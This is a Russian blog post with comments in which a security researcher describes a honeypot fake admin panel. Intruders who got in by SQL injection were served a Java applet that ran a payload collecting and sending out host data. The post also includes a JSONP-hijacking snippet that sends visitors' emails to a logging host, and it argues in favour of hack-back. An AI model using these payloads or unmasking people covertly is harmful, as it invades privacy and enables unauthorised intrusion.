Пользователь
0,0
рейтинг
10 июля 2013 в 16:54

Разработка → Сражаясь с анонимностью

Тема анонимности в Интернете является сейчас достаточно модной и интересной, и особенно теперь, когда новостные порталы пугают наc всякими там PRISM, правительственными инициативами и прочим. Большинство людей озабочены тем, как сохранить тайну своей личности в сети и поэтому все темы так или иначе посвящены ЗАЩИТЕ. Но иногда, раскрытие анонимности это не такое уж и плохое дело. Да-да, эта заметка — мой опыт борьбы с анонимностью своими силами, без помощи спец-служб…

image



Зачем?



Прежде всего… а зачем мне это? Я не «трехбуквенник», а скромный инженер, замыслов по захвату мира у меня пока нету и прочими недобросовестными делами я не занимаюсь, так чем же мне не угодила анонимность? Ответ прост — анонимусами, хацкерами, скрипт-кидисами… Эти ребята вечно пытаются что-то там сломать, украсть, испортить или погонять свое ЧСВ. Дело это, если подумать не такое уж и плохое (лучше чем в подворотне наркотиками баловаться), но раз ребята любят поиграть — давайте поиграем с ними. Их анонимность дело не святое, поэтому можно с ней и посражаться 8) Но как общий результат, все это работает с любым пользователем сети Интернет, просто я применил усилия исключительно против атакующих, тех кто пытается получить несанкционированный доступ и нарушить статью 272 УК РФ. Кроме того, мой опыт будет интересной иллюстрацией к теме «контратаки» на самих атакующих в автоматическом режиме без участия человека. Результат контратаки — раскрытие информации об атакующем, что, согласитесь, дело хорошее, а не плохое…

Бочонок с медом



Для того, чтобы не повредить анонимности ни в чем не повинных граждан и контратаковать только «злодеев», нужно быть уверенным, что данный юзверь — взломщик. Для этого достаточно иметь систему анализа поведения посетителя с механизмом обнаружения «атакующих» действий. Короче говоря, достаточно сделать honeypot. Для этого не надо разворачивать honeyd и тд. Например для общего случая с WEB ресурсом, достаточно на продакшн сервере расположить один псевдо-рабочий скрипт, который будет изображать полезность и функциональность, но на деле будет детектировать попытки проникновения и в случае «удачной» атаки изображать, что этот взлом удался. После этого исполнять контр-атаку на этого конкретного пользователя. Наглядный пример, создадим скрипт admin.php или /admin/ не важно, любой уважающий себя атакующий найдет этот URI за несколько секунд, это очевидный ход. В случае, если хочется повысить внимание нежелательных элементов к ловушке, можно разместить линк с главной страницы (мол админка тут), ведь главная задача, чтобы плохой парень начал атаковать первым делом хонипот, а не ковырялся в нормальных скриптах. В скрипте псевдо-админки, ясно дело, спрашивают логин и пароль. Далее дело фантазии, можно ждать когда атакующий пробрутит перебором пароль либо сделать эмуляцию уязвимости класса SQL Injection, и тогда подойдет любой пароль класса ' or 1=1/*, который будет давать доступ в «админку». При этом мы можем собирать статистику — как была взломана админка, подбором или через SQLi. Ну и само собой — любой кто попал в «админку» является «плохим» парнем, и его раскрытие его анонимности не вызывает у меня проблем морали.

Собственно в 2011 я разместил такой скрипт на своем горе сайте и стал ждать… ждал я не долго, так как сайт был посвящен теме ИБ, то желающих зОхакать его превышало всякое воображение.



Бей в лоб



Очевидно, что в самом общем случае, все что мы имеем об посетителе веб сайта (и атакующем, в нашем частном случае) это лишь IP адрес, User-Agent и тд. Как я говорил, мы не CIA/FSB/MOSSAD… у нас нет СОРМ или PRISM, и мы понимаем, что IP адрес (учитывая разные там Proxy серверы и TOR) — это фактически НИЧЕГО. С этим мы и имеем дело в большинстве случаев, но если разыграть один тонкий психологический момент (конкретно касающегося скрипт-кидди), то выяснится, что эти ребята не ждут подвоха! Другими словами, в теле «админки» можно сделать что угодно — повесить сплойт-пак например, и пробивать сплойтами нерадивых. Но я сыграл более «плоско», я запустил Апплет Java. Мол вы прошли аутентификацию… вот наша панель GUI на Java. Элемент социальной инженерии — атакующий в порыве радости от успешной атаки SQLi может тупо запустить апплет. И… я удивился, но таких было достаточно (конечно потом, с течением времени процент пробива падал, так как информация о подставе быстро разошлась среди узкого круга специалистов ;). Собственно апплет тупо дергал EXE файл с сервера и запускал его.
EXE файл собирал НЕ ПЕРСОНАЛЬНЫЕ данные (да да, я блюду ФЗ о ПДн...), только следующую инфу: IP локальный, traceroute из сети, имя машины, логин пользователя. Это не много, но в большинстве случаев этого достаточно чтобы обойти TOR/Proxy/VPN и даже узнать фамилию атакующего! Дополнительно, конечно, можно было бы собирать BSSID окружающих точек доступа, например, и делать съемку с веб-камеры ноута, парсить конфиг файлы с винта и тд и тп. Короче суть в том, что установив «агента контр-разведки» на ПК атакующего мы обошли многие преграды, и TOR и Proxy уже не при делах. Очевидная контр-атака. Примечание: мой агент не имел удаленного доступа, хотя технически это можно было закодить, я не хотел бекдорить и распространять вредоносное ПО. Данный агент не был вредоносным, так как собирал сугубо техническую инфу об ПК атакующего и его сетевом окружении. Кстати, все данные передавались реверсивным DNS каналом, что улучшало успешные «отстукивания» с данными — http://www.xakep.ru/post/55661/.

Интересные «атакующие»:

1) Министерство обороны РФ

Одни из первых, попытались применить атаку типа SQLi ребята с ВНЕШНЕГО IP Министерства обороны Российской Федерации. К моему счастью, они либо не повелись на апплет, либо у них был Linux (так как мне впадлу было добавлять кросс-платформенность). Я знаю, что там хорошие ребята и, конечно, ничего плохого они не хотели! Но надеюсь при реальных «разведывательных операциях» они используют хотя бы китайские прокси сервера ;)



2) Антивирусная компания

Этот запуск был сделан с виртуальной машины антивирусной компании. DNS сервер и tracert спалили контору 8) Примечательно что ребята не добавили агента в список вредоносного ПО! Оценили. Спасибо вам ребята!

3) Куча ребят

Просто куча разных ребят, кто-то знал о фиче и просто игрался, кто-то нет (http://habrahabr.ru/post/122107/#comment_4003842)



4) И самое интересное Хост принадлежащий РАЗВЕДКЕ одной из стран СНГ. С «обратным» проникновением.

Поначалу я решил что вот она, кибер война началась! Наш агент в результате контр-атаки оказался запущен на хосте, принадлежащем службе разведки другого гос-ва. Только учетная запись выглядела как сервисная, что наводило на мысль, что хост был скомпрометирован и использовался как посредник. Чуть позже в то же день мы получили инсталл второго «агента» из той же страны, только в этот раз не из сети правительственного учреждения, а с домашнего ПК. Имя пользователя ПК оказалось легко гуглящимся и идентифицировать человека вышло без проблем. При этом, учитывая, эти «совпадения», можно сказать что либо он работает на эту разведку, либо как-то получил доступ к правительственному хосту.



Ранение рикошетом



Окей, мы поняли, что простейший путь раскрытия анонимности — контратака через сплойт-паки или с элементами СИ, но это толсто и очевидно. Но была еще одна идея — сторонние сервисы, такие как веб-почта или, например, социальные сети. Можно сделать атаку более незаметной… что я и сделал 8)



Да, кроме апплета, в случае успешной атаки на меня, я узнавал e-mail атакующего, чтобы точно знать «кто виноват» (ну а что делать и так ясно..). И опять же, анонимность это не TOR/VPN/Proxy chain. Этого не достаточно! И так суть проста, если гражданин использует сервисы типа ВКонтакте, yandex, google, linkedin, twitter, facebook и тд… и при этом он на них постоянно аутентифицирован, то при наличии каких-либо уязвимостей (CSRF/XSS) на этих сервисах позволят раскрыть ВАШУ анонимность. Так получилось, что на сервисах mail.ru и yandex.ru были найдены уязвимости (я о них сообщил давно, и они давно запатчены, тем нем менее я успел испытать ради моего «научного» эксперимента по практической поимке злых парней...). Уязвимость самая банальная (на обоих сервисах): JSONP Hijacking. Суть проста, есть некий сервис:

mail-service.com/ajax?callback=func

Который использует cookie аутентификацию, и возвращает что-то типа:

func({"e-mail":"username@mail-service.com"});

Соответственно, для эксплуатации этой бреши и раскрытия анонимности используем код:

<script>
function func(obj)
{
     var url="http://loger.com/log.php?value="+obj["e-mail"];
     $.get(url);
}
</script>
<script src="http://mail-service.com/ajax?callback=func"/>


Так что помните: можете забыть о TOR/VPN, если вы вечно носитесь по соц. сетям, даже не надо иметь PRISM, чтобы проследить кто вы и откуда, достаточно «тупых» CSRF/XSS.

Типичный атакующий:


И еще...


Кстати, как еще пример такого подхода, сеть linkedin, даже не нужна уязвимость, там это реальная фича — лог тех, кто просматривал ваш профайл. То есть если на мою админку повесить тупо редирект на специальный зарегистрированный профайл linkedin:



То в итоге можем прямо в linkedin'е узнавать больше информации об атакующих:



Кстати, можно заметить, что SAMEORIGIN не помогает, так как GET запрос проходит до того, как браузер проверит ORIGIN политику, проверка происходит ПОТОМ ;)

Статистика



В конце немного статистики. Эксперимент длился с Q2 2011 до Q3 2012.

Всего УНИКАЛЬНЫХ атак SQLi — 484 (за ~1.2 года)

Из них успешных контр-атак (Java Applet) — 52 (за ~1.2 года)

Из них успешных контр-атак на mail.ru/yandex.ru — 16 (за 6 месяцев)

~ 17 % успеха при контр-атаках.

График зависимости:



Как видно, в начале был апплет, а «мыло» я добавил значительно позже. Пики по посещаемости связаны с анонсами ZeroNights и встреч Defcon группы. Пробив по почте фактически линейный, тогда как в случае апплетов -зависимость была линейной лишь в начале эксперимента. Это связано с обновлениями Java, антивирусы добавили апплет потом в базу вредоносного ПО (что неудивительно ибо он собран из metasploit пейлода)

P.S. Кстати, если с yandex.ru есть куда сообщать о найденных мной багах, то в случае с mail.ru я не нашел контакты, пока не познакомился с тамошним ИБшником и не слил багу ему лично…

Выводы



Хоть этот блог-пост больше о том как я ловил «плохих» парней, хотя на самом деле это можно экстраполировать на вопросы анонимности в сети Интернет — уж если ИТ/ИБ специалисты и хацкеры палятся, то что говорить о нормальных людях? Вполне очевидно, что TOR/Proxy и VPN не помогают в этом вопросе. Достаточно логина в соц.сети, невнимательности и еще много чего, чтобы однозначно сопоставить посетителя веб-ресурса с реальным человеком. Будьте аккуратнее и JFYI: Как работают настоящие зло-хакИры

Ну и второй вывод, контр-атака на атакующего не такая уж и плохая идея, меньше вы о нем знать не станете, но если «прокнет», то вы получите много интересной инфы. Кстати, в некотором государстве эти штуки уже работают (как мне сообщили). Так что кибер-война это весело!

P.S. Оригинальные материалы, где чуть более детально раскрыты баги:

Слайды с BH EU 2013
Текстик с BH EU 2013

May the Force be with you.
Alexey Sintsov @d00kie
карма
180,5
рейтинг 0,0
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Реклама

Самое читаемое Разработка

Комментарии (61)

  • +12
    Из своей админской повседневности:

    Только что я фиксил какую-то фигню зайдя по простой схеме: Я в отеле в Эмиратах, где фильтруют что попало в кривом вайфай. Я на планшете делаю pptp на корпоративный VPN, через него по VNC подключаюсь к компьютеру (в другом районе города), с него по ssh с туннелированием X-сервера подключаюсь к другому серверу, запускаю там rdesktop и чиню какую-то ерунду на виндовом сервере в местной локалке.

    Это не хаккерство, это так сказать, реальная жизнь с минимальным дискомфортом.
    • +1
      PPTP в Селектеле?
      • 0
        нет, в другой конторе (циска на радиусе). Можно было бы просто зайти по ssh, но андроид не умеет туннелировать нормально порты/X'ы, так что комфортнее по VNC на линуксовую машину. А pptp для шифрования (ssl для vnc не осилил, да особо и не стремился).
        • 0
          Все администрирование с планшета осуществляю с помощью VX ConnectBot и bVNC. Тут Вам и редирект портов с ssh-agent'ом, тут Вам и VNC over SSH по ключам из коробки с AutoX'ом. Автор bVNC(а так же aRDP и aSPICE) отзывчивый и понимает русский, хоть сам на нём писать не может. Еще JuiceSSH посмотрите, но она платная и closed-source.
          • 0
            Тут несколько сложнее ситуация. На сервере, на котором rdesktop, очень не хочется ставить что-либо другое (включая vnc server), так что у меня один сервер для vnc (первый попавшийся, который не жалко), а другой делает rdesktop.
        • 0
          ASA? Зачем PPTP ежели имеется IPSEC
          • 0
            В андроидах штатно pptp, кроме того, vpn не только для админа (я обычно с ноута напрямую ssh цепляюсь с прокинутыми X'ами), а для простых виндовых пользователей, у которых pptp самый легко поднимаемый протокол.
    • +1
      А я думал, что вы недоброжелатель майкрософта :)
      • +1
        Именно потому я и являюсь недоброжелателем майкрософта. Так сказать, по больному и горячему. Примерно 5% моей админской работы всё ещё связано с их продуктами, и они не перестают меня восхищать своей принципиальной антиэргономичностью.
  • +4
    Так ведь TOR запускает свою копию фаерфокса, в ней мало кто чекает почту и лазит вконтактике, так что и куков там быть не должно.
    • +2
      (Занудно) TOR — это просто умный прокси, он никаких браузеров сам не запускает и ничего не делает. А если вы пользуетесь какой-то сборной солянкой, то… то вы — не все.
      • 0
        Vidalia bundle добавляет в фаерфокс кнопочку по которой включается TOR и фаерфокс переключается в приватный режим.
      • 0
        www.torproject.org/ в комплекте идет «Tor Browser», фаерфокс настроенный под максимальную анонимность и всевозможными аддонами типа JS Блока.
        • +1
          Мне кажется, или вы описали как раз то, что я сказал — сборную солянку, bundle, в котором TOR-proxy является только одним из компонентов?

          Потому что TOR-прокси прекрасно работает и без Firefox-а, и даже без Vidalia (да что там, даже без графического интерфейса). И посему говорить, что «TOR запускает свою копию фаерфокса», как минимум, некорректно, равно как и считать «TOR-ом» какой-то сборный пак. Всё равно что браузер «Интернетом» называть.
          • +1
            Ну а почему вы называете tor-proxy — tor'ом вы ведь не называете процессор компьютером, верно? Тор всетаки это совокупность компонентов.
            • +3
              Потому что «TOR вообще» — это сеть. Состоящая из знающих друг про друга тех самых TOR-клиентов/прокси/бриджей. Вот они, эти самые компоненты, и TOR browser является просто одним, необязательным (и не для всех удобным), относительно поздно появившимся, сторонним их клиентом.

              Многие, например, этот bundle с tor browser-ом в глаза ни разу не видели, а пользуются TOR-ом прекрасно и без него, поставив сам TOR прокси из репозитория своей OS.
              • 0
                При всем уважении, многие не значит большенство, я привел вам оф. сайт с кнопкой скачать «tor», дистрибув то этой кнопке самодостаточен для анонимного серфинга в интерте, и сам запускает уже настроенный фаерфокс с примочками готовый к работе через tor proxy, если вы устанавливаете отдельно tor proxy из репозитория своей os, то скорее это у вас частный случай.
                • +4
                  я привел вам оф. сайт с кнопкой скачать «tor»,

                  Вы привели мне в качестве примера страницу с кнопками «Download Tor Browser Bundle» (обратите внимание, кнопки на главной странице “Download Tor” не позволяют сразу скачать что-то, а ведут на вторую страницу, где уже действительно можно скачать разные «Tor-ипостаси»).

                  Tor Browser Bundle — это не Tor, и даже не Tor Browser, а сущность уже третьего порядка.
                  Таких сущностей на том самом сайте достаточно много: Tor Browser Bundle, Vidalia Bridge Bundle, Vidalia Relay Bundle, Vidalia Exit Bundle, Expert Bundle… То, что во всех этих бандлах является «квинтэссенцией Tor-а», находится всё на том же оф. сайте по ссылке «Tor (standalone)».

                  На главной странице сайта Samsung сейчас — Samsung Galaxy S4 Zoom.
                  Но это не значит, что Samsung — это только Samsung Galaxy S4 Zoom.
                  • +1
                    Если ссылка на главной страничке с надписью «download tor» ведет на скачку исключительно Tor Browser Bundle просто для разных os(только по этому он не качается сразу), я думаю я имею полное право говорить что тор запускает анонимный браузер при старте. Так что вы меня не убедили.
                    • +4
                      Если ссылка на главной страничке с надписью «download tor» ведет на скачку исключительно Tor Browser Bundle просто для разных os(только по этому он не качается сразу),

                      Комментарий про Galaxy S4 Zoom вы проигнорировали, ну ок.

                      Так что вы меня не убедили.

                      Я не ставил себе задачей вас убедить. Я ставил себе задачей исправить вашу ошибку и предотвратить укоренение этой ошибки среди тех, кто может вас прочитать.
                      • –1
                        Ну и зануда… а по сути никто не ответил.
  • +6
    Разлогинился из LinkedIn…
    Про фичу которая показывает «ваш профиль просматривали» я знал, но только сейчас понял какая это дыра в безопасности(кстати, при платном доступе в linked in можно вроде бы ссылку на профиль видеть, а не «Lecturer in...»)
  • +2
    надо на сайт прикрутить — поднять продажи…
  • НЛО прилетело и опубликовало эту надпись здесь
  • +6
    Хмм я думал что минимальное требование при «баловстве» атаковать хотя бы с виртуальной машины на каком либо VPS сервере, в какой либо далекой стране) За статью спасибо! Интересная, познавательная, нужно будет попробовать)
    • 0
      Это не «требование», это — «сын ошибок трудных» ;-)
  • +3
    Отличная стать! С удовольствием прочитал, ждем еще в этом духе.
    • +2
      Я тоже открыл статью, чтобы почитать «бла-бла-бла» на тему анонимности в сети, а тут такой приятный сюрприз :)
  • +11
    Анекдот в тему. Пресс-конференция одного очень важного государственного деятеля. Случайный вопрос от неизвестного отправителя:
    — А не западло ли тебе, В.В., отвечать на анонимные вопросы из интернета?
    Ответ:
    — Нет, Иванов Иван Иванович, проживающий по адресу г. Нижние Булки, проспект Мичурина, дом 16, кв. 44, IP 214.14.****.***, не западло.
  • +15
    Анонимность это в первую очередь контроль распространения информации о себе, и только во вторую — скрытность. Я честный открытый человек, но я не хочу на каждом углу каждому прохожему, каждому кассиру показывать свой паспорт, банковскую карту, страховку и справку с места работы. В частности потому, что не понимаю зачем им именно эта информация.
    • +1
      В Украине к примеру без паспорта больше валюту не поменяешь. И оседают эти сканы паспортов во всех банках пачками.
      • 0
        В России тоже. Но меня это не коснулось, т.к. я меняю только через интернет-банкинг, поэтому непонятно кому (какому-то кассиру) свой паспорт не показываю.
  • 0
    мораль в том, что для анонимности нужно держать отдельный компьютер. ну или хотя бы виртуальную машину.
    • 0
      Ну или уж на самый худой случай отдельный браузер, и в нем в clearweb вообще не заходить.
  • +3
    >Но я сыграл более «плоско», я запустил Апплет Java.
    У каких идиотов они включены…

    >Собственно апплет тупо дергал EXE файл с сервера и запускал его. EXE файл собирал НЕ ПЕРСОНАЛЬНЫЕ данные
    Создание программ для ЭВМ или внесение изменений в существующие программы, ЗАВЕДОМО приводящих к НЕСАНКЦИОНИРОВАННОМУ уничтожению, блокированию, модификации либо КОПИРОВАНИЮ ИНФОРМАЦИИ, нарушению работы ЭВМ, системы ЭВМ или их сети, А РАВНО ИСПОЛЬЗОВАНИЕ ЛИБО РАСПРОСТРАНЕНИЕ таких программ или машинных носителей с такими программами — наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.

    >К моему счастью, они либо не повелись на апплет, либо у них был Linux
    К вашему несчастью вы признались и за вами уже выехали…

    >Интересные «атакующие»:
    а вот-это уже интересно… если не фейк
    только не факт, что именно они атакующие, а не их комп взломали и использовали в качестве прокси

    Рекомендации состоят чуть более чем полностью из капитанства.
    На самом деле самое опасное — это эксплоиты для уязвимостей вроде MS13-054, от них не защитит ничего, хотя огороживание всего и вся может косвенно защитить.
    Спасибо за исследование, будем знать.

    • +3
      > У каких идиотов они включены…
      Ну это уж как повезет…

      > Создание программ для ЭВМ…
      Ну притянуть за уши закон наш всегда можно под любую ситуацию, но в целом нет состава преступления. Программа не распространялась, а являлась частью приватной системы не доступной не авторизированным пользователям ;) Небыло никаких действии по ПРИЗЫВУ пользователей к запуску данного «агента», не было публичных линков. Не было рекламы, спама и тд… ну тут здравый смысл против широты трактования закона…

      >К вашему несчастью вы признались и за вами уже выехали…
      Так ребята уже 2 года как в курсе… я уж не говорю про ребят из ФСБ, они знают, что я паинька и в никаких таких делах не участвую…

      >только не факт…
      Не факт, о чем я так же и написал…

      >На самом деле самое опасное…
      Про 0деи — не интересно и очевидно, да и потом палить 0дей сплойты хацкерам с целью раскрытия анонимности? Уж больно дорого… Ну это тока США позволить себе может и то — для критичных объектов ))
      • 0
        >Не было рекламы, спама и тд… ну тут здравый смысл против широты трактования закона…
        Нет. На самом деле, тут ситуация ровно та же, как если бы вы поставили у себя на даче медвежий капкан, и в ваше отсутствие в него бы попался вор. Виноватым окажетесь вы, хотя вроде бы вор и не должен был лезть в ваш дом. Точнее судить будут и вас и вора, просто по разным статьям.
        • 0
          Не совсем. Аналогия не чистая. В случае капкана, я нанес физический урон, а может это и не вор а пожарник? Или милиционер гнался за кем то через мой двор… В таком случае я виноват. Но главное это не сопоставимый уровень ущерба. В моем же случае, я не ворую его личные данные, не устанавливаю пинча, не форматирую диск. То есть урона ему, как гражданину РФ не наношу. Это скорее можно сравнить как если бы вор украл у меня сотовый телефон, с программой, которая отстукивает на сервер по GPS… (хотя тож не корректно в конкретно моем примере)
          • +1
            Вы же не преступников — вы школоту ловите. Ваш капкан даже не на вора нацелен:) Вы впариваете свои программки самым слабым и беззащитным:) Это если я кавычку в логин воткну, то и ко мне значит можно в комп лезть? Ох, ненадежно всё и везде…
            • 0
              ' не то же самое что и ' or 1=1/*
              Но это пример, фильтр можно сделать более точным, определяющий именно «злой» умысел а не exploit probing.
              К тому же… после ввода осмысленной SQLI вам предложили запустить GUI от приватной зоны. И вы СОГЛАСИЛИСЬ. Хотя вам доступ не положен… вам сказали «Это мегесекретная херовина, для доступа мемеберов к нашему приватному интрфейсу», но вы все равно кликнули ОК… это ВЫ не знали какой функционал запустили, а все мемберы DCG7812 знали 8) Там целый год лежало описание ТОГО что вы запускаете. Это все рано что вы взломали мой ПК, скачали отттуда метасплойт, и запустили ворованный метрепретер у себя на компе… просто вы не знали что такое meterpreter… ну а ко мне какие претензии?
              • 0
                Никаких! Но при этом вы подтверждаете, что насилуете школоту!
                • 0
                  Насилую? В чем насилие?
                  • 0
                    Ну я не могу сформулировать так, чтобы было понятно. Разве не понятно? :) Суть-то не в том насилуете ли вы их или им в комп ненужные проги ставите, суть в охоте на школьника. Вашей целью был школьник, а не преступник. Вы использовали методы по вылавливанию карасей, а не акул. Т.е. речь не столько о статье про безопасность, сколько о расставливании сетей на школоту.
                    • 0
                      Там школьники продавали услуги по ДДоС, и компрометировали ПК разведки стран СНГ. Ну хз-хз… Да и 90% анонимусов это те же школьники, за которыми так все бегают и в СМИ раздувают… и Sony опустили на SQLi школьники опустили. ДА и большинство атак идет от ваших школьников, потом они в пастебин выкладывают базы ;) Какая разница, кто этот вандал?
                    • 0
                      Да генеев кибер войны так вряд ли поймаешь, не спорю, но это уже юбольше чем ничего 8) А еще бывают люди ошибаются, а еще бывает что те кто проводит атаки не те еж самые кто разрабатывают план и ПО для этих атак… Мой конкретный пример тупой и простой, и ловились в массе сркипткидди, но были и более интересные экземпляры. но главное это концепт идеи, если усложнять и развивать её, то можно ловить более хитрых и опасных людей.
                      • 0
                        А почему не заняться конструктивом и разрабатывать безопасные системы? Может быть надо подумать как-то на тему почему все эти системы такие уязвимые, может в их основу заложен хреновый принцип? Есть ли какие-то математические доказательства того, что от кибер-уязвимостей нет лекарства? Я всё подумываю, что если сформулировать перед инженерами требования по безопасности, то они разработают такие компы, которые будут соответсвовать этим требованиям.
                        • 0
                          Ну это разные задачи. Разные истории, разные блог-посты.

                          1) Писать не взламываемые системы
                          2) Играть с теми кто пытается их ломать

                          Так как про 1) пишут часто и много, и это более менее очевидно и банально, а вот 2) забавнее, интереснее, оригинальнее и новее.

                          Есть аксиома, что взломать можно все… тем не менее, для любителей строить мат модели безопасности кода: docs.google.com/presentation/d/1UNttXIjL8gAD7Bx0PeUtobCIMQmZ38GM7B0gUzct1lI/edit#slide=id.p

                          Но юмор в том, что на практике это работает очень скверно. Разработка и внедрение систем таким образом, что бы все это еще было и безопасно на 99% — очень трудоемкая задача. Тем не менее, убрать самые тупые баги, и даже хитрые баги в коде, сделать сносную архитектуру (с точки зрения безопасности), убедится в том, что деплой прошел как надо, и все сконфигурировано — можно. Дальше поддерживать все это 8)
                          • 0
                            По ссылке мне ничего не понятно. Вот биологические системы как-то подстроены так, что они живут и, кажется, не вымирают со временем. А компы ломаются и дохнут. Может быть (я предполагаю) есть какая-то причина, по которой компы сейчас все такие не надежные. Я вижу это так: программа исполняется процессором, если в програме есть какая-то ошибка, то система выстроена так, чтобы размножать ошибку по памяти и в конце концов накнуться на невыполнимую операцию и повеситься. Это как будто так было задумано инженерами в самом начале! Видимо, если разработать иные принципы, которые будут работать, ликвидируя ошибки, а не размножая их, то надежность подскочит под 100%. Если такими вещами занимаются, то где результаты?

                            Да, интерес не всегда совпадает с целесообразностью и огромное количество миллиардов человеко-лет делают то что интересное вопреки целесообразности. В войнушки интересно играть до бесконечности, но школьники плодятся в какой-то прогрессии, и не изменяя правил игры их не переиграешь:))
    • +2
      Идиотов?

      Покажите мне IP KVM, работающий без джавы. Желательно чтобы он был на 32 канала.
      • +2
        Вы правда ходите в интернет с постоянной включенной джавой? Откройте для себя возможность разных профилей в браузерах и\или включение плагинов для отдельных объектах на странице. Я думаю имело ввиду именно это.
  • +4
    Фишка с LinkedIn-ом прекрасна.
  • +1
    Сначала хотел написать, что нахождения уязвимости на Вашем сайте и логин к Вам в админку без совершения деструктивных действий ничем предосудительным не являются и применять к людям в ответ какие-то атакующие действия не правильно, но после слов «ява-апплет» и «еxe-файл» — беру свои слова обратно. Если люди проводят аудит со включенными ява-апплетами, которые могут запустить exe-файл, да еще и из-под основной браузерной учетки, таких надо учить.
    • 0
      На самом деле, если развивать эту тему, то можно однозначно отличить белошляпника-аудитора и черношляпника-злодея. В пейпере и на слайдах на конференции я про это говорил, что технически это возможно… Но в моем случае это скорее шутка для товарищей была и урок для скрипткидей.
  • 0
    Firewall с правильно настроенными правилами фильтрации спасает от таких Java-аплетов. Если передаваемые данные не шифруются, то их можно поймать и понять, что это контр-атака. Реальных анонимов, конечно, не раскрыть подсовыванием им трояна и воровством их кук.
  • 0
    Описка
    атак SQLi — 484 (за ~1.2 года)
    (Java Applet) — 52 (за ~1.2 года)
    52/484=10,74% успеха при контр-атаках.

    Экстраполяция с учетом успешных контр-атак на mail.ru/yandex.ru тоже дает другой результат.
    • 0
      (52 + 16x2 ) / 4.84 = ~17 %
      • 0
        «Экстраполяция с учетом успешных контр-атак на mail.ru/yandex.ru тоже дает другой результат.»
        484 (за ~1.2 года)
        52 (за ~1.2 года)
        16 (за 6 месяцев)=0.5 года
        разное время, поэтому используем экстраполяцию
        (52+1.2/0.5*16)/484=(52+38,4)/484=18,7%
        • 0
          да я на 0.2 года при экстраполяции забил 8)
  • +1
    Кажется, в этом ханипоте есть недочёт, который грамотного спеца натолкнёт на сомнения относительно реальности раскрутки псевдобаги.

    вот такой код приведёт к «несанкционированному доступу» в приватную часть, всё ок:
    ' or '1'='1/*


    но и код ниже тоже:
    ' or '1'='1 123


    А реальная БД ругнулась бы. Так что для спеца обман трудящихся налицо. Но для школоты — да, они на это внимания не обратят
    • 0
      ' or '1'='1/*
      вообще и на этот пример нормальная СУБД ругнется 8)
      Да там был regexp простенький, и понять, что это хонипот было проще простого, только обычно это понимание приходило чуть позже, чем апплет 8)
  • 0
    В Советской России сайты хакают вас. о_О

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.